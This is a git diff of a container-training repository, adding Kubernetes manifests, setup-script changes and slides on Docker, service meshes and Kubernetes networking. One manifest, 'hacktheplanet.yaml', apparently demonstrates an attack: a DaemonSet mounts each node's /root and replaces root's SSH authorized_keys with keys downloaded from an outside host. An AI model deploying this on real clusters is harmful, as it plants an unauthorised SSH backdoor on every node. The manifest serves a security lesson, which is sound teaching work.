mirror of
https://github.com/jpetazzo/container.training.git
synced 2026-02-14 17:49:59 +00:00
Merge branch 'master' into user-certificates
This commit is contained in:
34
k8s/hacktheplanet.yaml
Normal file
34
k8s/hacktheplanet.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
95
k8s/persistent-consul.yaml
Normal file
95
k8s/persistent-consul.yaml
Normal file
@@ -0,0 +1,95 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: Role
|
||||
metadata:
|
||||
name: consul
|
||||
rules:
|
||||
- apiGroups: [ "" ]
|
||||
resources: [ pods ]
|
||||
verbs: [ get, list ]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: consul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: consul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: consul
|
||||
namespace: orange
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: consul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: consul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: consul
|
||||
spec:
|
||||
serviceName: consul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: consul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: consul
|
||||
spec:
|
||||
serviceAccountName: consul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- consul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.4.4"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
39
k8s/psp-privileged.yaml
Normal file
39
k8s/psp-privileged.yaml
Normal file
@@ -0,0 +1,39 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||
38
k8s/psp-restricted.yaml
Normal file
38
k8s/psp-restricted.yaml
Normal file
@@ -0,0 +1,38 @@
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
annotations:
|
||||
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
|
||||
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
|
||||
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
|
||||
name: restricted
|
||||
spec:
|
||||
allowPrivilegeEscalation: false
|
||||
fsGroup:
|
||||
rule: RunAsAny
|
||||
runAsUser:
|
||||
rule: RunAsAny
|
||||
seLinux:
|
||||
rule: RunAsAny
|
||||
supplementalGroups:
|
||||
rule: RunAsAny
|
||||
volumes:
|
||||
- configMap
|
||||
- emptyDir
|
||||
- projected
|
||||
- secret
|
||||
- downwardAPI
|
||||
- persistentVolumeClaim
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:restricted
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['restricted']
|
||||
|
||||
70
k8s/volumes-for-consul.yaml
Normal file
70
k8s/volumes-for-consul.yaml
Normal file
@@ -0,0 +1,70 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node2
|
||||
annotations:
|
||||
node: node2
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node2
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node3
|
||||
annotations:
|
||||
node: node3
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node3
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: PersistentVolume
|
||||
metadata:
|
||||
name: consul-node4
|
||||
annotations:
|
||||
node: node4
|
||||
spec:
|
||||
capacity:
|
||||
storage: 10Gi
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
persistentVolumeReclaimPolicy: Delete
|
||||
local:
|
||||
path: /mnt/consul
|
||||
nodeAffinity:
|
||||
required:
|
||||
nodeSelectorTerms:
|
||||
- matchExpressions:
|
||||
- key: kubernetes.io/hostname
|
||||
operator: In
|
||||
values:
|
||||
- node4
|
||||
|
||||
@@ -248,6 +248,14 @@ EOF"
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
@@ -383,6 +391,15 @@ _cmd_retag() {
|
||||
aws_tag_instances $OLDTAG $NEWTAG
|
||||
}
|
||||
|
||||
_cmd ssh "Open an SSH session to the first node of a tag"
|
||||
_cmd_ssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Logging into $IP"
|
||||
ssh docker@$IP
|
||||
}
|
||||
|
||||
_cmd start "Start a group of VMs"
|
||||
_cmd_start() {
|
||||
while [ ! -z "$*" ]; do
|
||||
@@ -481,12 +498,12 @@ _cmd_helmprom() {
|
||||
if i_am_first_node; then
|
||||
kubectl -n kube-system get serviceaccount helm ||
|
||||
kubectl -n kube-system create serviceaccount helm
|
||||
helm init --service-account helm
|
||||
sudo -u docker -H helm init --service-account helm
|
||||
kubectl get clusterrolebinding helm-can-do-everything ||
|
||||
kubectl create clusterrolebinding helm-can-do-everything \
|
||||
--clusterrole=cluster-admin \
|
||||
--serviceaccount=kube-system:helm
|
||||
helm upgrade --install prometheus stable/prometheus \
|
||||
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
|
||||
@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.
|
||||
|
||||
---
|
||||
|
||||
## Section summary
|
||||
## Some popular service meshes
|
||||
|
||||
We've learned how to:
|
||||
... And related projects:
|
||||
|
||||
* Understand the ambassador pattern and what it is used for (service portability).
|
||||
|
||||
For more information about the ambassador pattern, including demos on Swarm and ECS:
|
||||
|
||||
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
|
||||
|
||||
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
|
||||
|
||||
Some services meshes and related projects:
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
|
||||
<br/>
|
||||
Transparently secures service-to-service connections with mTLS.
|
||||
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
<br/>
|
||||
API gateway that can interconnect applications on VMs, containers, and serverless.
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
<br/>
|
||||
A popular service mesh.
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
<br/>
|
||||
Another popular service mesh.
|
||||
|
||||
---
|
||||
|
||||
## Learning more about service meshes
|
||||
|
||||
A few blog posts about service meshes:
|
||||
|
||||
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
|
||||
<br/>
|
||||
Provides historical context: how did we do before service meshes were invented?
|
||||
|
||||
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
|
||||
<br/>
|
||||
Explains the purpose of service meshes. Illustrates some NGINX features.
|
||||
|
||||
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
|
||||
<br/>
|
||||
Includes high-level overview and definitions.
|
||||
|
||||
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
|
||||
<br/>
|
||||
Includes a step-by-step demo of Linkerd.
|
||||
|
||||
And a video:
|
||||
|
||||
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
|
||||
|
||||
@@ -528,7 +528,9 @@ Very short instructions:
|
||||
- `docker network create mynet --driver overlay`
|
||||
- `docker service create --network mynet myimage`
|
||||
|
||||
See https://jpetazzo.github.io/container.training for all the deets about clustering!
|
||||
If you want to learn more about Swarm mode, you can check
|
||||
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
|
||||
or [these slides](https://container.training/swarm-selfpaced.yml.html).
|
||||
|
||||
---
|
||||
|
||||
|
||||
5
slides/containers/Exercise_Composefile.md
Normal file
5
slides/containers/Exercise_Composefile.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
9
slides/containers/Exercise_Dockerfile_Advanced.md
Normal file
9
slides/containers/Exercise_Dockerfile_Advanced.md
Normal file
@@ -0,0 +1,9 @@
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
5
slides/containers/Exercise_Dockerfile_Basic.md
Normal file
5
slides/containers/Exercise_Dockerfile_Basic.md
Normal file
@@ -0,0 +1,5 @@
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
@@ -203,4 +203,90 @@ bash: figlet: command not found
|
||||
|
||||
* The basic Ubuntu image was used, and `figlet` is not here.
|
||||
|
||||
* We will see in the next chapters how to bake a custom image with `figlet`.
|
||||
---
|
||||
|
||||
## Where's my container?
|
||||
|
||||
* Can we reuse that container that we took time to customize?
|
||||
|
||||
*We can, but that's not the default workflow with Docker.*
|
||||
|
||||
* What's the default workflow, then?
|
||||
|
||||
*Always start with a fresh container.*
|
||||
<br/>
|
||||
*If we need something installed in our container, build a custom image.*
|
||||
|
||||
* That seems complicated!
|
||||
|
||||
*We'll see that it's actually pretty easy!*
|
||||
|
||||
* And what's the point?
|
||||
|
||||
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
|
||||
|
||||
---
|
||||
|
||||
## Pets vs. Cattle
|
||||
|
||||
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
|
||||
|
||||
* Pets:
|
||||
|
||||
* have distinctive names and unique configurations
|
||||
|
||||
* when they have an outage, we do everything we can to fix them
|
||||
|
||||
* Cattle:
|
||||
|
||||
* have generic names (e.g. with numbers) and generic configuration
|
||||
|
||||
* configuration is enforced by configuration management, golden images ...
|
||||
|
||||
* when they have an outage, we can replace them immediately with a new server
|
||||
|
||||
* What's the connection with Docker and containers?
|
||||
|
||||
---
|
||||
|
||||
## Local development environments
|
||||
|
||||
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
|
||||
|
||||
* create VM from base template (Ubuntu, CentOS...)
|
||||
|
||||
* install packages, set up environment
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shutdown VM
|
||||
|
||||
* next time we need to work on project, restart VM as we left it
|
||||
|
||||
* if we need to tweak the environment, we do it live
|
||||
|
||||
* Over time, the VM configuration evolves, diverges.
|
||||
|
||||
* We don't have a clean, reliable, deterministic way to provision that environment.
|
||||
|
||||
---
|
||||
|
||||
## Local development with Docker
|
||||
|
||||
* With Docker, the workflow looks like this:
|
||||
|
||||
* create container image with our dev environment
|
||||
|
||||
* run container with that image
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shutdown container
|
||||
|
||||
* next time we need to work on project, start a new container
|
||||
|
||||
* if we need to tweak the environment, we create a new image
|
||||
|
||||
* We have a clear definition of our environment, and can share it reliably with others.
|
||||
|
||||
* Let's see in the next chapters how to bake a custom image with `figlet`!
|
||||
|
||||
@@ -70,8 +70,9 @@ class: pic
|
||||
|
||||
* An image is a read-only filesystem.
|
||||
|
||||
* A container is an encapsulated set of processes running in a
|
||||
read-write copy of that filesystem.
|
||||
* A container is an encapsulated set of processes,
|
||||
|
||||
running in a read-write copy of that filesystem.
|
||||
|
||||
* To optimize container boot time, *copy-on-write* is used
|
||||
instead of regular copy.
|
||||
@@ -177,8 +178,11 @@ Let's explain each of them.
|
||||
|
||||
## Root namespace
|
||||
|
||||
The root namespace is for official images. They are put there by Docker Inc.,
|
||||
but they are generally authored and maintained by third parties.
|
||||
The root namespace is for official images.
|
||||
|
||||
They are gated by Docker Inc.
|
||||
|
||||
They are generally authored and maintained by third parties.
|
||||
|
||||
Those images include:
|
||||
|
||||
@@ -188,7 +192,7 @@ Those images include:
|
||||
|
||||
* Ready-to-use components and services, like redis, postgresql...
|
||||
|
||||
* Over 130 at this point!
|
||||
* Over 150 at this point!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -6,8 +6,6 @@ In this chapter, we will:
|
||||
|
||||
* Present (from a high-level perspective) some orchestrators.
|
||||
|
||||
* Show one orchestrator (Kubernetes) in action.
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||
@@ -30,27 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- - containers/Copying_Files_During_Build.md
|
||||
- |
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- |
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -64,13 +48,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- |
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Composefile.md
|
||||
- - containers/Docker_Machine.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -30,9 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -45,6 +47,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -166,7 +166,7 @@
|
||||
|
||||
- Upgrade kubelet:
|
||||
```bash
|
||||
apt install kubelet=1.14.1-00
|
||||
apt install kubelet=1.14.2-00
|
||||
```
|
||||
|
||||
]
|
||||
@@ -267,7 +267,7 @@
|
||||
|
||||
- Perform the upgrade:
|
||||
```bash
|
||||
sudo kubeadm upgrade apply v1.14.1
|
||||
sudo kubeadm upgrade apply v1.14.2
|
||||
```
|
||||
|
||||
]
|
||||
@@ -287,8 +287,8 @@
|
||||
- Download the configuration on each node, and upgrade kubelet:
|
||||
```bash
|
||||
for N in 1 2 3; do
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.1
|
||||
ssh node $N sudo apt install kubelet=1.14.1-00
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
|
||||
ssh node $N sudo apt install kubelet=1.14.2-00
|
||||
done
|
||||
```
|
||||
]
|
||||
@@ -297,7 +297,7 @@
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- All our nodes should now be updated to version 1.14.1
|
||||
- All our nodes should now be updated to version 1.14.2
|
||||
|
||||
.exercise[
|
||||
|
||||
|
||||
@@ -136,6 +136,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane on special nodes
|
||||
|
||||
- It is common to reserve a dedicated node for the control plane
|
||||
@@ -158,6 +160,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane outside containers
|
||||
|
||||
- The services of the control plane can run in or out of containers
|
||||
@@ -177,6 +181,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
No!
|
||||
@@ -193,6 +199,8 @@ No!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
Yes!
|
||||
@@ -215,6 +223,8 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
- On our development environments, CI pipelines ... :
|
||||
@@ -231,25 +241,21 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes resources
|
||||
## Interacting with Kubernetes
|
||||
|
||||
- The Kubernetes API defines a lot of objects called *resources*
|
||||
- We will interact with our Kubernetes cluster through the Kubernetes API
|
||||
|
||||
- These resources are organized by type, or `Kind` (in the API)
|
||||
- The Kubernetes API is (mostly) RESTful
|
||||
|
||||
- It allows us to create, read, update, delete *resources*
|
||||
|
||||
- A few common resource types are:
|
||||
|
||||
- node (a machine — physical or virtual — in our cluster)
|
||||
|
||||
- pod (group of containers running together on a node)
|
||||
|
||||
- service (stable network endpoint to connect to one or multiple containers)
|
||||
- namespace (more-or-less isolated group of things)
|
||||
- secret (bundle of sensitive data to be passed to a container)
|
||||
|
||||
And much more!
|
||||
|
||||
- We can see the full list by running `kubectl api-resources`
|
||||
|
||||
(In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -69,3 +69,46 @@
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
---
|
||||
|
||||
## Switching to another namespace
|
||||
|
||||
- We can create a new namespace and switch to it
|
||||
|
||||
(Helm will automatically use the namespace specified in our context)
|
||||
|
||||
- We can also tell Helm which namespace to use
|
||||
|
||||
.exercise[
|
||||
|
||||
- Tell Helm to use a specific namespace:
|
||||
```bash
|
||||
helm install dockercoins --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=magenta
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
|
||||
@@ -73,18 +73,13 @@
|
||||
|
||||
- Dump the `rng` resource in YAML:
|
||||
```bash
|
||||
kubectl get deploy/rng -o yaml --export >rng.yml
|
||||
kubectl get deploy/rng -o yaml >rng.yml
|
||||
```
|
||||
|
||||
- Edit `rng.yml`
|
||||
|
||||
]
|
||||
|
||||
Note: `--export` will remove "cluster-specific" information, i.e.:
|
||||
- namespace (so that the resource is not tied to a specific namespace)
|
||||
- status and creation timestamp (useless when creating a new resource)
|
||||
- resourceVersion and uid (these would cause... *interesting* problems)
|
||||
|
||||
---
|
||||
|
||||
## "Casting" a resource to another
|
||||
|
||||
@@ -1,6 +1,20 @@
|
||||
## Declarative vs imperative in Kubernetes
|
||||
|
||||
- Virtually everything we create in Kubernetes is created from a *spec*
|
||||
- With Kubernetes, we cannot say: "run this container"
|
||||
|
||||
- All we can do is write a *spec* and push it to the API server
|
||||
|
||||
(by creating a resource like e.g. a Pod or a Deployment)
|
||||
|
||||
- The API server will validate that spec (and reject it if it's invalid)
|
||||
|
||||
- Then it will store it in etcd
|
||||
|
||||
- A *controller* will "notice" that spec and act upon it
|
||||
|
||||
---
|
||||
|
||||
## Reconciling state
|
||||
|
||||
- Watch for the `spec` fields in the YAML files later!
|
||||
|
||||
|
||||
@@ -61,7 +61,7 @@ There are many possibilities!
|
||||
|
||||
- creates a new custom type, `Remote`, exposing a git+ssh server
|
||||
|
||||
- deploy by pushing YAML or Helm Charts to that remote
|
||||
- deploy by pushing YAML or Helm charts to that remote
|
||||
|
||||
- Replacing built-in types with CRDs
|
||||
|
||||
|
||||
@@ -234,6 +234,6 @@
|
||||
|
||||
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
|
||||
|
||||
- Gitkube can also deploy Helm Charts
|
||||
- Gitkube can also deploy Helm charts
|
||||
|
||||
(instead of raw YAML files)
|
||||
|
||||
@@ -276,3 +276,21 @@ error: the server doesn't have a resource type "endpoint"
|
||||
- There is no `endpoint` object: `type Endpoints struct`
|
||||
|
||||
- The type doesn't represent a single endpoint, but a list of endpoints
|
||||
|
||||
---
|
||||
|
||||
## Exposing services to the outside world
|
||||
|
||||
- The default type (ClusterIP) only works for internal traffic
|
||||
|
||||
- If we want to accept external traffic, we can use one of these:
|
||||
|
||||
- NodePort (expose a service on a TCP port between 30000-32768)
|
||||
|
||||
- LoadBalancer (provision a cloud load balancer for our service)
|
||||
|
||||
- ExternalIP (use one node's external IP address)
|
||||
|
||||
- Ingress (a special mechanism for HTTP services)
|
||||
|
||||
*We'll see NodePorts and Ingresses more in detail later.*
|
||||
|
||||
@@ -79,6 +79,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Exploring types and definitions
|
||||
|
||||
- We can list all available resource types by running `kubectl api-resources`
|
||||
@@ -102,9 +104,11 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Introspection vs. documentation
|
||||
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.14/)
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/#api-reference)
|
||||
|
||||
- The API documentation is usually easier to read, but:
|
||||
|
||||
|
||||
@@ -320,6 +320,8 @@ We could! But the *deployment* would notice it right away, and scale back to the
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
### Streaming logs of many pods
|
||||
|
||||
- Let's see what happens if we try to stream the logs for more than 5 pods
|
||||
@@ -347,6 +349,8 @@ use --max-log-requests to increase the limit
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Why can't we stream the logs of many pods?
|
||||
|
||||
- `kubectl` opens one connection to the API server per pod
|
||||
|
||||
@@ -16,6 +16,8 @@
|
||||
|
||||
- each pod is aware of its IP address (no NAT)
|
||||
|
||||
- pod IP addresses are assigned by the network implementation
|
||||
|
||||
- Kubernetes doesn't mandate any particular implementation
|
||||
|
||||
---
|
||||
@@ -30,7 +32,7 @@
|
||||
|
||||
- No new protocol
|
||||
|
||||
- Pods cannot move from a node to another and keep their IP address
|
||||
- The network implementation can decide how to allocate addresses
|
||||
|
||||
- IP addresses don't have to be "portable" from a node to another
|
||||
|
||||
@@ -82,13 +84,17 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The Container Network Interface (CNI)
|
||||
|
||||
- The CNI has a well-defined [specification](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration) for network plugins
|
||||
- Most Kubernetes clusters use CNI "plugins" to implement networking
|
||||
|
||||
- When a pod is created, Kubernetes delegates the network setup to CNI plugins
|
||||
- When a pod is created, Kubernetes delegates the network setup to these plugins
|
||||
|
||||
- Typically, a CNI plugin will:
|
||||
(it can be a single plugin, or a combination of plugins, each doing one task)
|
||||
|
||||
- Typically, CNI plugins will:
|
||||
|
||||
- allocate an IP address (by calling an IPAM plugin)
|
||||
|
||||
@@ -96,8 +102,46 @@
|
||||
|
||||
- configure the interface as well as required routes etc.
|
||||
|
||||
- Using multiple plugins can be done with "meta-plugins" like CNI-Genie or Multus
|
||||
---
|
||||
|
||||
- Not all CNI plugins are equal
|
||||
class: extra-details
|
||||
|
||||
(e.g. they don't all implement network policies, which are required to isolate pods)
|
||||
## Multiple moving parts
|
||||
|
||||
- The "pod-to-pod network" or "pod network":
|
||||
|
||||
- provides communication between pods and nodes
|
||||
|
||||
- is generally implemented with CNI plugins
|
||||
|
||||
- The "pod-to-service network":
|
||||
|
||||
- provides internal communication and load balancing
|
||||
|
||||
